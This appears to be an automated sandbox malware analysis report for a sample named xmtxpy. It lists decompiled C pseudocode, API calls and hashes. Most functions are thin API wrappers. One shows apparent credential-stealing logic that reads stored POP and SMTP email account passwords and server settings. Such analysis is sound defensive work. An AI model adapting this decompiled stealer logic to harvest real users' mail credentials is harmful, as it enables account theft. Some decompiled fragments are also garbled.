                          • Opcode ID: 450bda5b085385e41399d185e0c6d92315b9743f5e19a8ad8642e29fe69941a3
                          • Instruction ID: 291ca984118c00001a410e8fe814b9ebecee15bf7cc635df9db1cfcd8d33b31d
                          • Opcode Fuzzy Hash: 450bda5b085385e41399d185e0c6d92315b9743f5e19a8ad8642e29fe69941a3
                          • Instruction Fuzzy Hash: 0EB092B004820C3EAE002EF19C05C3B3E8DEA4454870044757E0CE5051EA36DE1110A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00403BEF Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00403BEF(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xda6ae59a, 0, 0);
				_t4 = FindClose(_a4); // executed
				return _t4;
			}





                          0x00403bfc
                          0x00403c04
                          0x00403c07

                          APIs
                          • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseFind
                          • String ID:
                          • API String ID: 1863332320-0
                          • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                          • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                          • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                          • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00403BB7 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00403BB7(WCHAR* _a4) {
				long _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xc6808176, 0, 0);
				_t4 = GetFileAttributesW(_a4); // executed
				return _t4;
			}





                          0x00403bc4
                          0x00403bcc
                          0x00403bcf

                          APIs
                          • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                          • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                          • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                          • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004049FF Relevance: 1.5, APIs: 1, Instructions: 11registryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E004049FF(void* _a4) {
				long _t3;
				void* _t4;

				E004031E5(_t4, 9, 0xd980e875, 0, 0);
				_t3 = RegCloseKey(_a4); // executed
				return _t3;
			}





                          0x00404a0d
                          0x00404a15
                          0x00404a18

                          APIs
                          • RegCloseKey.KERNEL32(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close
                          • String ID:
                          • API String ID: 3535843008-0
                          • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                          • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                          • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                          • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00403B64 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00403B64(WCHAR* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 2, 0xdc0853e1, 0, 0);
				_t3 = PathFileExistsW(_a4); // executed
				return _t3;
			}





                          0x00403b72
                          0x00403b7a
                          0x00403b7d

                          APIs
                          • PathFileExistsW.SHLWAPI(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExistsFilePath
                          • String ID:
                          • API String ID: 1174141254-0
                          • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                          • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                          • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                          • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00404DE5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                          Download Yara Rule
                          APIs
                          • closesocket.WS2_32(00404EB0), ref: 00404DEB
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: closesocket
                          • String ID:
                          • API String ID: 2781271927-0
                          • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                          • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                          • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                          • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004044EE Relevance: 1.3, APIs: 1, Instructions: 77COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E004044EE(void* __ecx, void* __eflags, WCHAR* _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16) {
				intOrPtr _v8;
				void* _t25;
				void* _t28;
				long _t29;
				signed int _t36;
				void* _t45;
				signed int _t53;
				signed int _t55;
				signed int _t58;
				void* _t61;
				void* _t63;

				_t36 = 0x400;
				_t53 = 2;
				_t58 = 0x400;
				_t61 = E00402B7C( ~(0 | __eflags > 0x00000000) | 0x00000400 * _t53);
				if(_t61 == 0) {
					L4:
					_t25 = 0;
				} else {
					_v8 = 0x800;
					while(1) {
						E00402B4E(_t61, 0, _t58 + _t58);
						_t28 = E004044A7(_a8, _a12, _a16, _t61, _t58, _a4);
						_t13 = _t58 - 1; // 0x3ff
						_t63 = _t63 + 0x24;
						_t66 = _t28 - _t13;
						if(_t28 != _t13) {
							break;
						}
						_v8 = _v8 + 0x800;
						_t36 = _t36 + 0x400;
						E00402BAB(_t61);
						_t55 = 2;
						_t58 = _t36;
						_t61 = E00402B7C( ~(0 | _t66 > 0x00000000) | _t36 * _t55);
						if(_t61 != 0) {
							continue;
						} else {
							goto L4;
						}
						goto L5;
					}
					_t29 = GetLastError();
					_t45 = 2;
					__eflags = _t29 - _t45;
					if(_t29 != _t45) {
						_t25 = _t61;
					} else {
						E00402BAB(_t61);
						goto L4;
					}
				}
				L5:
				return _t25;
			}














                          0x004044f5
                          0x004044fe
                          0x00404501
                          0x00404512
                          0x00404517
                          0x0040457c
                          0x0040457c
                          0x00404519
                          0x00404519
                          0x00404520
                          0x00404527
                          0x0040453a
                          0x0040453f
                          0x00404542
                          0x00404545
                          0x00404547
                          0x00000000
                          0x00000000
                          0x00404549
                          0x00404550
                          0x00404557
                          0x00404562
                          0x00404565
                          0x00404574
                          0x0040457a
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040457a
                          0x00404585
                          0x0040458d
                          0x0040458e
                          0x00404590
                          0x0040459b
                          0x00404592
                          0x00404593
                          0x00000000
                          0x00404598
                          0x00404590
                          0x0040457e
                          0x00404584

                          APIs
                            • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                            • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                            • Part of subcall function 004044A7: GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?,00000000,F66BE5A2,00000000,00000000), ref: 004044CB
                          • GetLastError.KERNEL32 ref: 00404585
                            • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                            • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Process$AllocateErrorFreeLastPrivateProfileString
                          • String ID:
                          • API String ID: 4065557613-0
                          • Opcode ID: a7ed1a25bbf88e5834c69dfb6a8f660cc79c8b059c99c8b9ed313f4bc5696491
                          • Instruction ID: 4921b4961515552709d35feb502e82dc384c9b3b90426e204c6f6ec5e0b55acd
                          • Opcode Fuzzy Hash: a7ed1a25bbf88e5834c69dfb6a8f660cc79c8b059c99c8b9ed313f4bc5696491
                          • Instruction Fuzzy Hash: 901157B26011043BEB249EA9AD46F7FB768DF84368F10413FFB05E61D0EA789C00069C
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00403F9E Relevance: 1.3, APIs: 1, Instructions: 16COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00403F9E(void* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 0, 0xf53ecacb, 0, 0);
				_t3 = VirtualFree(_a4, 0, 0x8000); // executed
				return _t3;
			}





                          0x00403fac
                          0x00403fba
                          0x00403fbe

                          APIs
                          • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeVirtual
                          • String ID:
                          • API String ID: 1263568516-0
                          • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                          • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                          • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                          • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00403C40 Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00403C40(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xfbce7a42, 0, 0);
				_t4 = CloseHandle(_a4); // executed
				return _t4;
			}





                          0x00403c4d
                          0x00403c55
                          0x00403c58

                          APIs
                          • CloseHandle.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle
                          • String ID:
                          • API String ID: 2962429428-0
                          • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                          • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                          • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                          • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00406472 Relevance: 1.3, APIs: 1, Instructions: 12sleepCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00406472(long _a4) {
				void* _t3;
				void* _t4;

				_t3 = E004031E5(_t4, 0, 0xcfa329ad, 0, 0);
				Sleep(_a4); // executed
				return _t3;
			}





                          0x0040647f
                          0x00406487
                          0x0040648a

                          APIs
                          • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: Sleep
                          • String ID:
                          • API String ID: 3472027048-0
                          • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                          • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                          • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                          • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions

                          Function 0040D069 Relevance: 12.6, Strings: 10, Instructions: 138COMMON
                          Download Yara Rule
                          C-Code - Quality: 88%
                          			E0040D069(void* __ebx, void* __eflags, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t40;
				intOrPtr _t45;
				intOrPtr _t47;
				void* _t71;
				void* _t75;
				void* _t77;

				_t72 = _a4;
				_t71 = E00404BEE(__ebx,  *_a4, L"EmailAddress");
				_t81 = _t71;
				if(_t71 != 0) {
					_push(__ebx);
					_t67 = E00404BEE(__ebx,  *_t72, L"Technology");
					_v16 = E00404BEE(_t37,  *_t72, L"PopServer");
					_v40 = E00404BA7(_t81,  *_t72, L"PopPort");
					_t40 = E00404BEE(_t37,  *_t72, L"PopAccount");
					_v8 = _v8 & 0x00000000;
					_v20 = _t40;
					_v24 = E00404C4E(_t71,  *_t72, L"PopPassword",  &_v8);
					_v28 = E00404BEE(_t67,  *_t72, L"SmtpServer");
					_v44 = E00404BA7(_t81,  *_t72, L"SmtpPort");
					_t45 = E00404BEE(_t67,  *_t72, L"SmtpAccount");
					_v12 = _v12 & 0x00000000;
					_v32 = _t45;
					_t47 = E00404C4E(_t71,  *_t72, L"SmtpPassword",  &_v12);
					_t77 = _t75 + 0x50;
					_v36 = _t47;
					if(_v8 != 0 || _v12 != 0) {
						E00405872( *0x49f934, _t71, 1, 0);
						E00405872( *0x49f934, _t67, 1, 0);
						_t74 = _v16;
						E00405872( *0x49f934, _v16, 1, 0);
						E00405781( *0x49f934, _v40);
						E00405872( *0x49f934, _v20, 1, 0);
						_push(_v8);
						E00405762(_v16,  *0x49f934, _v24);
						E00405872( *0x49f934, _v28, 1, 0);
						E00405781( *0x49f934, _v44);
						E00405872( *0x49f934, _v32, 1, 0);
						_push(_v12);
						E00405762(_t74,  *0x49f934, _v36);
						_t77 = _t77 + 0x88;
					} else {
						_t74 = _v16;
					}
					E0040471C(_t71);
					E0040471C(_t67);
					E0040471C(_t74);
					E0040471C(_v20);
					E0040471C(_v24);
					E0040471C(_v28);
					E0040471C(_v32);
					E0040471C(_v36);
				}
				return 1;
			}





















                          0x0040d070
                          0x0040d080
                          0x0040d084
                          0x0040d086
                          0x0040d08c
                          0x0040d0a0
                          0x0040d0ae
                          0x0040d0bd
                          0x0040d0c0
                          0x0040d0c5
                          0x0040d0c9
                          0x0040d0e3
                          0x0040d0f2
                          0x0040d101
                          0x0040d104
                          0x0040d109
                          0x0040d110
                          0x0040d11e
                          0x0040d123
                          0x0040d126
                          0x0040d12d
                          0x0040d145
                          0x0040d154
                          0x0040d15a
                          0x0040d166
                          0x0040d174
                          0x0040d186
                          0x0040d18e
                          0x0040d19a
                          0x0040d1ac
                          0x0040d1ba
                          0x0040d1cc
                          0x0040d1d1
                          0x0040d1dd
                          0x0040d1e2
                          0x0040d1e7
                          0x0040d1e7
                          0x0040d1e7
                          0x0040d1eb
                          0x0040d1f1
                          0x0040d1f7
                          0x0040d1ff
                          0x0040d207
                          0x0040d20f
                          0x0040d217
                          0x0040d21f
                          0x0040d227
                          0x0040d230

                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                          • API String ID: 0-2111798378
                          • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                          • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                          • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                          • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 008A4173 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 84COMMON
                          Download Yara Rule
                          C-Code - Quality: 93%
                          			E008A4173(signed int __eax, void* __edx, void* __edi) {
				intOrPtr* _t14;
				void* _t15;
				void* _t20;
				void* _t21;
				void* _t22;
				intOrPtr _t23;
				signed int _t32;
				void* _t42;
				void* _t43;
				signed int _t44;
				void* _t46;
				void* _t47;

				_t43 = __edi;
				_t42 = __edx;
				_t44 = __eax & 0x0000ffff;
				E008AF990(2);
				_t14 = 0x5a4d;
				_t47 =  *0x8a0000 - _t14; // 0x5a4d
				if(_t47 == 0) {
					_t14 =  *0x8a003c; // 0xe0
					__eflags =  *((intOrPtr*)(_t14 + 0x8a0000)) - 0x4550;
					if(__eflags != 0) {
						goto L2;
					} else {
						__eflags =  *((intOrPtr*)(_t14 + 0x8a0018)) - 0x10b;
						if(__eflags != 0) {
							goto L2;
						} else {
							_t32 = 0;
							__eflags =  *((intOrPtr*)(_t14 + 0x8a0074)) - 0xe;
							if(__eflags > 0) {
								__eflags =  *(_t14 + 0x8a00e8);
								_t6 =  *(_t14 + 0x8a00e8) != 0;
								__eflags = _t6;
								_t32 = 0 | _t6;
							}
						}
					}
				} else {
					L2:
					_t32 = 0;
				}
				 *(_t46 - 0x1c) = _t32;
				asm("in al, 0xe8");
				asm("lds ecx, [eax]");
				 *_t14 =  *_t14 + _t14;
				_t48 = _t14;
				if(_t14 == 0) {
					E008AE9B0(0x1c);
				}
				_t15 = E008AEDFA(_t32, _t43, _t48);
				_t49 = _t15;
				if(_t15 == 0) {
					_t15 = E008AE9B0(0x10);
				}
				E008AFA79(_t15);
				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
				if(E008AF1A3(_t32, _t43, _t44, _t49) < 0) {
					E008AE9B0(0x1b);
				}
				 *0x8c101c = GetCommandLineW();
				 *0x8bf0c8 = E008AFAB9();
				_t20 = E008AF457();
				_t51 = _t20;
				if(_t20 < 0) {
					_t20 = E008AEED7(_t32, _t42, _t43, _t44, _t51, 8);
				}
				_t21 = E008AF694(_t20, _t32, _t42, _t43, _t44);
				_t52 = _t21;
				if(_t21 < 0) {
					E008AEED7(_t32, _t42, _t43, _t44, _t52, 9);
				}
				_t22 = E008AEF11(1);
				_t53 = _t22;
				if(_t22 != 0) {
					E008AEED7(_t32, _t42, _t43, _t44, _t53, _t22);
				}
				_t23 = E008AFEF7();
				_push(_t44);
				E008A1000(0x8a0000, 0, _t23);
				_t45 = _t23;
				 *((intOrPtr*)(_t46 - 0x24)) = _t23;
				if(_t32 == 0) {
					E008AF17A(_t45);
				}
				E008AEF02();
				 *(_t46 - 4) = 0xfffffffe;
				return E008AFF95(_t45);
			}















                          0x008a4173
                          0x008a4173
                          0x008ae871
                          0x008ae876
                          0x008ae87c
                          0x008ae881
                          0x008ae888
                          0x008ae88e
                          0x008ae893
                          0x008ae89d
                          0x00000000
                          0x008ae89f
                          0x008ae8a4
                          0x008ae8ab
                          0x00000000
                          0x008ae8ad
                          0x008ae8ad
                          0x008ae8af
                          0x008ae8b6
                          0x008ae8b8
                          0x008ae8be
                          0x008ae8be
                          0x008ae8be
                          0x008ae8be
                          0x008ae8b6
                          0x008ae8ab
                          0x008ae88a
                          0x008ae88a
                          0x008ae88a
                          0x008ae88a
                          0x008ae8c1
                          0x008ae8c3
                          0x008ae8c5
                          0x008ae8c7
                          0x008ae8c9
                          0x008ae8cb
                          0x008ae8cf
                          0x008ae8d4
                          0x008ae8d5
                          0x008ae8da
                          0x008ae8dc
                          0x008ae8e0
                          0x008ae8e5
                          0x008ae8e6
                          0x008ae8eb
                          0x008ae8f6
                          0x008ae8fa
                          0x008ae8ff
                          0x008ae906
                          0x008ae910
                          0x008ae915
                          0x008ae91a
                          0x008ae91c
                          0x008ae920
                          0x008ae925
                          0x008ae926
                          0x008ae92b
                          0x008ae92d
                          0x008ae931
                          0x008ae936
                          0x008ae939
                          0x008ae93f
                          0x008ae941
                          0x008ae944
                          0x008ae949
                          0x008ae94a
                          0x008ae94f
                          0x008ae958
                          0x008ae95d
                          0x008ae95f
                          0x008ae964
                          0x008ae967
                          0x008ae967
                          0x008ae96c
                          0x008ae9a1
                          0x008ae9af

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.669434494.00000000008A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008A0000, based on PE: true
                          • Associated: 00000006.00000002.669427489.00000000008A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.669456673.00000000008B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.669464683.00000000008BE000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.669470976.00000000008C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_8a0000_xmtxpy.jbxd
                          Similarity
                          • API ID: _fast_error_exit$CommandEnvironmentInitializeLineStrings___crt__cinit__ioinit__wsetargv__wsetenvp__wwincmdln
                          • String ID: .$
                          • API String ID: 965155184-2223841709
                          • Opcode ID: d09755f6bcf8eb5ce504bbe7748687d9629dc642e3d684f51b6e9c39cebf42d6
                          • Instruction ID: 87fadd7b4f139cd9cb2d781ec796443bfced0a472ba5b3baf0f4ca82842a2aec
                          • Opcode Fuzzy Hash: d09755f6bcf8eb5ce504bbe7748687d9629dc642e3d684f51b6e9c39cebf42d6
                          • Instruction Fuzzy Hash: B621B360A0071599FB607BF8988676B2650FF13754F244C7AFA05DADD3EFB8C8808A53
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 008A30E5 Relevance: 16.6, APIs: 11, Instructions: 68COMMON
                          Download Yara Rule
                          C-Code - Quality: 91%
                          			E008A30E5(void* __eax, void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t10;
				void* _t15;
				void* _t16;
				void* _t17;
				intOrPtr _t18;
				void* _t27;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t41;

				_t39 = __esi;
				_t38 = __edi;
				_t37 = __edx;
				_t27 = __ebx;
				 *((intOrPtr*)(__ecx - 0x7f)) =  *((intOrPtr*)(__ecx - 0x7f)) + __eax;
				asm("in al, 0xe8");
				asm("lds ecx, [eax]");
				 *__ecx =  *__ecx + __ecx;
				_t43 = __ecx;
				if(__ecx == 0) {
					E008AE9B0(0x1c);
				}
				_t10 = E008AEDFA(_t27, _t38, _t43);
				_t44 = _t10;
				if(_t10 == 0) {
					_t10 = E008AE9B0(0x10);
				}
				E008AFA79(_t10);
				 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
				if(E008AF1A3(_t27, _t38, _t39, _t44) < 0) {
					E008AE9B0(0x1b);
				}
				 *0x8c101c = GetCommandLineW();
				 *0x8bf0c8 = E008AFAB9();
				_t15 = E008AF457();
				_t46 = _t15;
				if(_t15 < 0) {
					_t15 = E008AEED7(_t27, _t37, _t38, _t39, _t46, 8);
				}
				_t16 = E008AF694(_t15, _t27, _t37, _t38, _t39);
				_t47 = _t16;
				if(_t16 < 0) {
					E008AEED7(_t27, _t37, _t38, _t39, _t47, 9);
				}
				_t17 = E008AEF11(1);
				_t48 = _t17;
				if(_t17 != 0) {
					E008AEED7(_t27, _t37, _t38, _t39, _t48, _t17);
				}
				_t18 = E008AFEF7();
				_push(_t39);
				E008A1000(0x8a0000, 0, _t18);
				_t40 = _t18;
				 *((intOrPtr*)(_t41 - 0x24)) = _t18;
				if(_t27 == 0) {
					E008AF17A(_t40);
				}
				E008AEF02();
				 *(_t41 - 4) = 0xfffffffe;
				return E008AFF95(_t40);
			}













                          0x008a30e5
                          0x008a30e5
                          0x008a30e5
                          0x008a30e5
                          0x008a30e8
                          0x008ae8c3
                          0x008ae8c5
                          0x008ae8c7
                          0x008ae8c9
                          0x008ae8cb
                          0x008ae8cf
                          0x008ae8d4
                          0x008ae8d5
                          0x008ae8da
                          0x008ae8dc
                          0x008ae8e0
                          0x008ae8e5
                          0x008ae8e6
                          0x008ae8eb
                          0x008ae8f6
                          0x008ae8fa
                          0x008ae8ff
                          0x008ae906
                          0x008ae910
                          0x008ae915
                          0x008ae91a
                          0x008ae91c
                          0x008ae920
                          0x008ae925
                          0x008ae926
                          0x008ae92b
                          0x008ae92d
                          0x008ae931
                          0x008ae936
                          0x008ae939
                          0x008ae93f
                          0x008ae941
                          0x008ae944
                          0x008ae949
                          0x008ae94a
                          0x008ae94f
                          0x008ae958
                          0x008ae95d
                          0x008ae95f
                          0x008ae964
                          0x008ae967
                          0x008ae967
                          0x008ae96c
                          0x008ae9a1
                          0x008ae9af

                          APIs
                          • _fast_error_exit.LIBCMT ref: 008AE8CF
                            • Part of subcall function 008AE9B0: __FF_MSGBANNER.LIBCMT ref: 008AE9BC
                            • Part of subcall function 008AE9B0: __NMSG_WRITE.LIBCMT ref: 008AE9C4
                          • _fast_error_exit.LIBCMT ref: 008AE8E0
                          • __RTC_Initialize.LIBCMT ref: 008AE8E6
                          • __ioinit.LIBCMT ref: 008AE8EF
                          • _fast_error_exit.LIBCMT ref: 008AE8FA
                          • GetCommandLineW.KERNEL32 ref: 008AE900
                          • ___crtGetEnvironmentStringsW.LIBCMT ref: 008AE90B
                          • __wsetargv.LIBCMT ref: 008AE915
                          • __wsetenvp.LIBCMT ref: 008AE926
                          • __cinit.LIBCMT ref: 008AE939
                          • __wwincmdln.LIBCMT ref: 008AE94A
                          Memory Dump Source
                          • Source File: 00000006.00000002.669434494.00000000008A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008A0000, based on PE: true
                          • Associated: 00000006.00000002.669427489.00000000008A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.669456673.00000000008B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.669464683.00000000008BE000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.669470976.00000000008C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_8a0000_xmtxpy.jbxd
                          Similarity
